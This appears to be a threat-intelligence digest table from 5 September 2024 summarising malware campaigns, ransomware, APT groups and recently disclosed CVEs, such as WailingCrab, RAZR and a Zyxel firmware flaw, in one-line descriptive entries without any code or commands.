5.9.24 | WailingCrab: A WikiLoader variant exploiting VPN Spoofs | VIRUS | | A recent report from Palo Alto reveals that WailingCrab, a variant of WikiLoader, is being distributed through SEO poisoning and spoofed GlobalProtect VPN software. This campaign primarily targets the U.S. higher education and transportation sectors. The attack vector involves multiple stages such as DLL sideloading, shellcode injection, and using MQTT for command and control. |
5.9.24 | Luxy Infostealer | VIRUS | | Luxy is a recently discovered malware variant with both infostealing and ransomware capabilities. Luxy collects various confidential information from the compromised machines, including credentials, browser data, cookies, cryptocurrency wallets, etc. The ransomware module is used to encrypt files on the infected endpoint using the AES-256 algorithm. |
5.9.24 | Cybercriminals Target Malaysia's Digital Lifestyle with SpyNote | VIRUS | | Around the world, e-commerce (shopping), service-oriented (food delivery, ride-hailing, and on-demand services), digital payment and deal aggregator Android applications are highly popular. |
5.9.24 | CVE-2024-7593 - Ivanti Virtual Traffic Manager (vTM) Authentication Bypass vulnerability | VULNEREBILITY | | CVE-2024-7593 is a critical (CVSS score 9.8) XML authentication bypass vulnerability affecting Ivanti Virtual Traffic Manager (vTM). Successful exploitation of this flaw could allow attackers to bypass authentication and create new administrative users. |
5.9.24 | RAZR Ransomware | RANSOM | | RAZR is a recently identified ransomware variant that abuses a web hosting service called PythonAnywhere for hosting the malicious binaries. The malware uses the AES-256 algorithm for encryption and appends the .raz extension to the filenames. The ransom note is dropped in the form of a text file, README.txt, in which the attackers also threaten that the confidential files have not only been encrypted but also exfiltrated. |
5.9.24 | Macropack | HACKING | Malware | Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads |
5.9.24 | KTLVdoor | MALWARE | Backdoor | Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion |
5.9.24 | CVE-2024-20439 | VULNEREBILITY | CVE | (CVSS score: 9.8) - The presence of an undocumented static user credential for an administrative account that an attacker could exploit to log in to an affected system |
5.9.24 | CVE-2024-20440 | VULNEREBILITY | CVE | (CVSS score: 9.8) - A vulnerability arising due to an excessively verbose debug log file that an attacker could exploit to access such files by means of a crafted HTTP request and obtain credentials that can be used to access the API |
5.9.24 | APT Lazarus | APT | APT | APT Lazarus: Eager Crypto Beavers, Video calls and Games |
5.9.24 | RansomHub Ransomware | RANSOMWARE | RANSOMWARE | #StopRansomware: RansomHub Ransomwa |
5.9.24 | CVE-2024-7261 | VULNEREBILITY | CVE | The improper neutralization of special elements in the parameter "host" in the CGI program of Zyxel NWA1123ACv3 firmware version 6.70(ABVT.4) and earlier, WAC500 firmware version 6.70(ABVS.4) and earlier, WAX655E firmware version 7.00(ACDO.1) and earlier, WBE530 firmware version 7.00(ACLE.1) |
5.9.24 | Revival Hijack | HACKING | HACKING | Revival Hijack – PyPI hijack technique exploited in the wild, puts 22K packages at risk |
5.9.24 | CVE-2024-32896 | VULNEREBILITY | CVE | There is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. |
5.9.24 | WikiLoader | MALWARE | Loader | Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant |
5.9.24 | Head Mare | GROUP | GROUP | Head Mare: adventures of a unicorn in Russia and Belarus |
5.9.24 | Cicada3301 | RANSOMWARE | RANSOMWARE | Decoding the Puzzle: Cicada3301 Ransomware Threat Analysis |
5.9.24 | Rocinante | MALWARE | Trojan | Rocinante: The trojan horse that wanted to fly |